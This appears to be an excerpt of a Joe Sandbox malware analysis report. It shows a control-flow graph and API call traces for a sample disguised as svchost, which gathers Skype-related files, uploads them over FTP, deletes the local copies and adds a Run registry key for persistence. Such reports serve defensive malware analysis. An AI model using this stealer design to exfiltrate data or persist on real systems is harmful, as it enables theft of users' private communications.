FtpCreateDirectoryA 569->572 570->567 571->569 574 67269e-67273b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA 571->574 588 672b07-672b10 572->588 589 6734e0-67355a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 674bfc 572->589 577 672741-672749 574->577 578 67288e-67289f FindNextFileA 574->578 577->578 580 67274f-672757 577->580 578->569 582 6728a5 578->582 580->578 583 67275d-67288b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 580->583 582->565 583->578 590 672b18-672b29 588->590 592 672c93-672cbb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 590->592 593 672b2f-672b9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 590->593 597 672cc1-672d1c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 592->597 598 67334f-673367 592->598 595 672bd4-672c8e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA 593->595 596 672ba1-672bd2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 593->596 620 67333d-67334b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 595->620 596->595 596->596 602 672d53-672dff ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 597->602 603 672d1e 597->603 600 672b12 598->600 601 67336d-67336f 598->601 600->590 601->589 605 673375-673394 memset 601->605 607 672e01-672e16 fgetc 602->607 606 672d20-672d51 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 603->606 609 673396 605->609 610 6733be-67342c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 RegOpenKeyExA RegSetValueExA RegCloseKey 605->610 606->602 606->606 611 672e27-672e36 607->611 612 672e18-672e24 fputc 607->612 614 6733a0-6733bc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 609->614 610->589 625 673432-6734da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 610->625 616 672fa6-672fa9 611->616 617 672e3c-672ebf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 fclose ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 611->617 612->611 614->610 614->614 616->607 619 672faf-672fcd fclose * 2 616->619 626 672ef4-672fa3 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 617->626 627 672ec1-672ef2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 617->627 623 673336 619->623 624 672fd3-67304e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 619->624 620->598 623->620 628 673083-673171 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 624->628 629 673050-673081 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 624->629 625->589 626->616 627->626 627->627 632 6731a6-673247 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 628->632 633 673173-6731a4 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 628->633 629->628 629->629 634 673283-673330 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 632->634 635 673249 632->635 633->632 633->633 634->623 634->624 637 673250-673281 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 635->637 637->634 637->637
      APIs
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006728F2
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067290A
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 00672924
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(00000000), ref: 00672947
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067295B
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672970
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672985
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729A8
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729CB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006729FB
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,26DFE5F7,00000000,00675699,000000FF,00672550,?,?,?,26DFE5F7), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,26DFE5F7), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,26DFE5F7), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00020424,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,26DFE5F7), ref: 00671363
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672A12
      • FindNextFileA.KERNEL32(?,?), ref: 00672A2D
      • FindClose.KERNEL32(00000000), ref: 00672A40
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672A52
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672A67
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF,00000000), ref: 00672A82
      • sprintf.MSVCR90 ref: 00672A89
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672AA2
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AB6
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\skype,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672ABF
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672AD1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672AE3
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AF0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672B3B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672B51
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00672B61
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,%s\%s,00000000), ref: 00672B76
      • sprintf.MSVCR90 ref: 00672B7D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672B96
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BB3
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672BC9
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BE6
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,00000000), ref: 00672BF5
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672C03
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676378,?,?,?,00000000), ref: 00672C11
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(0067A5CC,?,?,?,00000000), ref: 00672C1F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(-FF984454), ref: 00672C35
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672C4E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00672C69
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00672C74
      • FtpPutFileA.WININET(00000000,00000000), ref: 00672C81
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C,?,?,?,?,?,?,?,?,?,?,?,?,00675924,000000FF), ref: 00672CA5
      • fopen.MSVCR90 ref: 00672CAC
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672CCD
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672CDE
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,%d%s,00000000,00000000), ref: 00672CF3
      • sprintf.MSVCR90 ref: 00672CFA
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672D13
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672D32
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672D48
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672D65
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00678FCC,00676378,?,?,?,00000000), ref: 00672D7D
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90 ref: 00672D98
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 00672DB1
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672DC6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672DDB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C), ref: 00672DEF
      • fopen.MSVCR90 ref: 00672DF6
      • fgetc.MSVCR90 ref: 00672E06
      • fputc.MSVCR90 ref: 00672E1A
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673345
      • memset.MSVCR90 ref: 00673384
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006733A6
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006733CF
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$V01@$??0?$basic_string@$??1?$basic_string@V01@@$??$?D@1@@std@@D@2@@0@V?$basic_string@Y?$basic_string@$??4?$basic_string@?erase@?$basic_string@V10@V12@$CreateDirectoryFileFindsprintf$Nextfopen$CloseMessageSendV10@0@fgetcfputcmemset
      • String ID: $ $%s\%s$-$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$\skype$a$m$v_%d
      • API String ID: 1465116219-3013915691
      • Opcode ID: 1a53786ce0d4c5363bf4e779de79ff35aef13a3d475cfcc69d1760a1cbddc005
      • Instruction ID: aeb47bc4745a562eae54584e5f277f29dba42ac773cf3a6f19cae8d305a4c62d
      • Opcode Fuzzy Hash: 1a53786ce0d4c5363bf4e779de79ff35aef13a3d475cfcc69d1760a1cbddc005
      • Instruction Fuzzy Hash: 0BE17C71108781DFD728DB64DD59BEE7BA6BB84705F00990CF58E832A1DB705988CF62
      APIs
      • fgetc.MSVCR90 ref: 00671E85
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00671E9F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671EAD
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(00000000), ref: 00671EB8
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(</info>,00000000), ref: 00671ED1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671EEC
      • fprintf.MSVCR90 ref: 00671EF9
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(<info>,00000000), ref: 00671F09
      • memset.MSVCR90 ref: 00671F25
      • feof.MSVCR90 ref: 00671F35
      • fprintf.MSVCR90 ref: 00671F58
      • fprintf.MSVCR90 ref: 00671F88
      • fprintf.MSVCR90 ref: 00671FC0
      • fprintf.MSVCR90 ref: 00671FF0
      • fprintf.MSVCR90 ref: 00672020
      • fprintf.MSVCR90 ref: 0067202B
      • fclose.MSVCR90 ref: 00672037
      • fclose.MSVCR90 ref: 0067203A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00672049
      • FtpPutFileA.WININET(00000000,nf2,00000000), ref: 0067205C
      • DeleteFileA.KERNEL32(nf2), ref: 00672067
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672079
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067208B
      • fopen.MSVCR90 ref: 006720A0
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006720B1
      • fprintf.MSVCR90 ref: 006720C4
      • fprintf.MSVCR90 ref: 006720D4
      • fprintf.MSVCR90 ref: 006720E4
      • fprintf.MSVCR90 ref: 006720F3
      • fprintf.MSVCR90 ref: 006720FB
      • fprintf.MSVCR90 ref: 00672109
      • fprintf.MSVCR90 ref: 0067213C
      • fprintf.MSVCR90 ref: 0067216C
      • fprintf.MSVCR90 ref: 00672174
      • fclose.MSVCR90 ref: 0067217A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 0067218D
      • FtpPutFileA.WININET(00000000,006763D4,00000000), ref: 006721A0
      • DeleteFileA.KERNEL32(006763D4), ref: 006721AB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006721C0
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: fprintf$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$File$??1?$basic_string@?find@?$basic_string@fclose$Delete$??4?$basic_string@V01@feoffgetcfopenmemset
      • String ID: %s$</info>$<info>$nf2
      • API String ID: 1196744205-608960993
      • Opcode ID: bcaaa18e1407548a44accc76cecf9b06d131c89ab0c819b2996b75365760f455
      • Instruction ID: e3f02dc1863ff0edf748f749317b92217bc2aae7e7c2e3dba6122f5a41c888b8
      • Opcode Fuzzy Hash: bcaaa18e1407548a44accc76cecf9b06d131c89ab0c819b2996b75365760f455
      • Instruction Fuzzy Hash: 1231B230148701DFD728DB64DD09BEABBA6BB45705F40841DF54E821E0DB75A948CF63
      APIs
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 00671ACC
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00671AE1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C), ref: 00671AF5
      • fopen.MSVCR90 ref: 00671B02
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00678FCC,00676378), ref: 00671B26
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90(?), ref: 00671B44
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671B55
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C), ref: 00671B66
      • fopen.MSVCR90 ref: 00671B6D
      • fgetc.MSVCR90 ref: 00671B75
      • fputc.MSVCR90 ref: 00671B85
      • fclose.MSVCR90 ref: 00671B94
      • fclose.MSVCR90 ref: 00671B97
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,00676378,?,?,?,?,?,?,?,00000000,?), ref: 00671BAB
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90 ref: 00671BC6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671BD7
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00671BE7
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671BF4
      • FtpPutFileA.WININET(00000000,00000000), ref: 00671C01
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671C11
      • DeleteFileA.KERNEL32(00000000), ref: 00671C18
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C2A
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C3C
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C51
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C66
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C7E
